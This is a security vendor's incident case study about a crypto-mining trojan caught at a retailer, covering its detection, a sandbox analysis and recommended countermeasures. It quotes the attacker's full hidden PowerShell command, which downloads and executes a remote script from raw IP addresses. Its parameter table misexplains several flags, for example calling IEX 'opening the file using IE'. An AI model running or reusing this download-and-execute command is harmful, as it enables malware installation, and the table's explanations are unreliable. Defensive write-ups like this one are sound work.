Crypto mining via PowerShell Caught at Retailer

The Network: A retailer with over 400 employees, over twelve distribution warehouses, and an extensive supply chain network to protect.

The Expectation: Protect the retailer’s assets and sensitive data to avoid malicious activity and enable services that are the backbone of the business.

The Catch:  Netsurion’s SOC (Security Operations Center) detected malware that bypassed the customer’s traditional Anti-Virus (AV) software. Netsurion’s blue team, defending the retail customer, used relevant queries to cross-check systems for suspicious behavior and to search running processes for anomalies.

The Find:  The Netsurion SOC used the advanced logic in Netsurion Open XDR to detect a suspicious command with cmd.exe invoking PowerShell to download a suspicious file via http://209.222.101.129:80/a. PowerShell’s malicious use is often not detected or stopped by traditional endpoint defenses, as files and commands are not written to disk. Netsurion’s security analysts actively monitors for suspicious use of well-known attack vectors such as PowerShell.

Command Line: powershell.exe -nop -w hidden -c “IEX ((new-object net.webclient) .downloadstring(‘http://209.222.101.129:80/a’))”.

The attacker then tried to evade the detection using:

Command Parameter Description
powershell.exe  
-nop No Profile
-w Execution Policy Hidden
hidden Execution Policy Hidden
-c Command to run
“IEX Opening the file using IE
((new-object net.webclient).downloadstring Download
(http://63.250.42.171:80/a))” URL to download

Netsurion’s security analyst detected the suspicious non-FQDN (Fully Qualified Domain Name) in the command line. The SOC analyst then uncovered a suspicious DLL downloaded to the system.

Observation: Netsurion detected that SVChost.exe has created W3wp.exe process and downloaded Trojan Process 1588408199.3060014.dll, which threat vendors have categorized as a Trojan type of malware.

Win32/Tiggre!rfn.Trojan:Win32/Tiggre!rfn: is a malicious program created by cyber criminals to mine cryptocurrency on victims’ computers. The unauthorized file is sent out to users as a video file, but it is an AutoIt script that runs specific tasks to misuse the computer’s resources for crypto mining.

After testing it in the Netsurion SOC sandbox, these activities confirmed that the URL was malicious:

  • Searches for the Microsoft Outlook file path
  • Attempts to load missing DLLs
  • Matches YARA signature
  • Creates temporary files
  • Reads ini files
  • Uses new MSVCR DLLs
  • Creates files inside the user directory
  • Reads software policies
  • Runs a DLL by calling functions
  • Spawns suspicious processes
  • Uses an in-process (OLE) automation server

Crypto mining malware infects workstations and laptops to create armies of botnets that perform computational-intensive algorithms in the background of unsuspecting companies. Crypto mining impacts system performance, consume power, and can be the doorway to other nefarious activity like stealing credentials or sensitive data to monetize. Use has exploded recently as exploit kits can be bought on the dark web for under $50 and used by less technical attackers. Crypto miners use known attack vectors like unsolicited phishing emails, socially engineered links, and malicious third-party apps that exploit vulnerabilities that should be detected and removed.

The Fix: Netsurion’s SOC promptly alerted the retail customer to the compromise and provided detailed remediation recommendations. The security analyst in the SOC continued to monitor the network for further infection and possible lateral movement. We recommended the following countermeasures to protect the retailer and their extended supply chain:

  • Block file attachments that are commonly associated with malware, such as .dll and .exe, and attachments that cannot be scanned by Anti-Virus software, such as .zip files
  • Apply appropriate patches and update as quickly as feasible  
  • Check for unwanted browser extensions
  • Implement filters at the email gateway to screen out emails with known malspam indicators, such as known malicious subject lines, and block suspicious IP addresses at the firewall.
  • Adhere to the principle of least privilege. By ensuring that users have the minimum level of access required to accomplish their duties, you limit access to those with a “need to know” and share administrative credentials with designated administrators and not executives.
  • Provide employee training on social engineering and phishing. Urge employees not to open suspicious emails, click links contained in such emails, or post sensitive information online, and to never provide usernames, passwords, or personal information in response to any unsolicited request. Educate users to hover over a link with their mouse to verify the destination prior to clicking on the link.

The Lesson: It is estimated that 20% of all businesses have been compromised by crypto-mining malware. Adversaries exploit known vulnerabilities to run their process-intensive mining. Legacy Anti-Virus (AV) solutions are often bypassed by these financially motivated cyber criminals. Consistent 24×7 monitoring, along with threat detection and response capabilities, is crucial for visibility and advanced threat protection along with a focused threat-hunting team.